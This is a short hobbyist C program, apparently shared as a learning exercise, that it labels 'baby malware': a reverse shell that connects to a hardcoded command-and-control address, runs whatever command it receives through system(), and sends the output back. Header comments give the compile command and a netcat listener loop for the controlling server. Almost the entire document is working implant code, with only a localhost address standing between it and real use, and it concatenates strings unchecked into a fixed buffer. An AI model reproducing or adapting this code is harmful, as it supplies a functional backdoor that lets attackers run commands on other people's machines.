Baby Malware (Reverse shell)

main.c

// This snippet intents to simulate a baby malware.
// The malware upon running connects to a server, currently hardcoded as 127.0.0.1:8080
// From server, it accepts a command to be executed locally
// It executes the command locally and then send back the response to the server. 
// Basically, just a reverse shell binary. Now when thinking about it, this could have been done in a bash one liner also 🤔
// But I had fun editing some little C code. So, cool.

// to compile : gcc -o main main.c 
// run ./main
// to run the command&control server : while true; do echo -e 'id' | nc -l 8080 ; done

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>

#define BUFFER_SIZE 4096

int connectToCnc(char * target, int port, char * request, char * cmd){
    
    struct sockaddr_in server_addr;
    int bytes_received;
    int sockfd;

    // Create socket
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror("Socket creation failed");
        return EXIT_FAILURE;
    }

    // Set up server address
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(port);
    if (inet_pton(AF_INET, target , &server_addr.sin_addr) <= 0) {
        perror("Invalid address");
        close(sockfd);
        return EXIT_FAILURE;
    }

    // Connect to server
    if (connect(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
        perror("Connection failed");
        close(sockfd);
        return EXIT_FAILURE;
    }

    printf("Connection to cnc succeeded\n");

    // Send request
    if (send(sockfd, request, strlen(request), 0) < 0) {
        perror("Send failed");
        close(sockfd);
        return EXIT_FAILURE;
    }

    printf("Sending init req to cnc succeeded\n");

    // Receive response
    while ((bytes_received = recv(sockfd, cmd, BUFFER_SIZE - 1, 0)) > 0) {
        cmd[bytes_received-1] = '\0'; //truncating \n received from server
        printf("Received from cnc: %s\n", cmd);
    }

    if (bytes_received < 0) {
        perror("Receive failed");
    }

    return sockfd;
}

int sendResult(int sockfd, char* output){
    printf("\nSending back to cnc: %s\n",output);
    if (send(sockfd, output, strlen(output), 0) < 0) {
        perror("Send response failed");
        close(sockfd);
        return EXIT_FAILURE;
    }

    return 0;
}

int executeCmd(char * cmd, char * output){
    *output = '\0'; // clearing the variable 

    char output_file[] = "/tmp/temp_output.txt";

    char buffer2[BUFFER_SIZE];
    strcat(cmd," > "); 
    strcat(cmd,output_file); 
    printf("Command to execute locally: %s",cmd);

    system(cmd); //execute cmd

    // Open the temporary file for reading
    FILE *fp_tmpfile = fopen(output_file, "r");
    if (fp_tmpfile == NULL) {
        perror("Failed to open output_file");
        exit(EXIT_FAILURE);
    }
    
    while (fgets(buffer2, sizeof(buffer2), fp_tmpfile) != NULL) {
        strcat(output, buffer2);
    }

    // Close the file & delete file
    unlink(output_file);
    fclose(fp_tmpfile);
    return 0;
}

int main(int argv, char** argc) {
    int sockfd;
    char cmd[BUFFER_SIZE];
    char output[BUFFER_SIZE] = "";

    char request[] = "GET / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n";
    char cnc_ip[] = "127.0.0.1";
    int port = 8080;

    sockfd = connectToCnc(cnc_ip, port, request, cmd); // connect to Command&ctrl, get cmd to execute

    executeCmd(cmd,output); // execute shell command
    
    sendResult(sockfd,output); // Send response back to server

    close(sockfd); // Close server connection

    return EXIT_SUCCESS;
}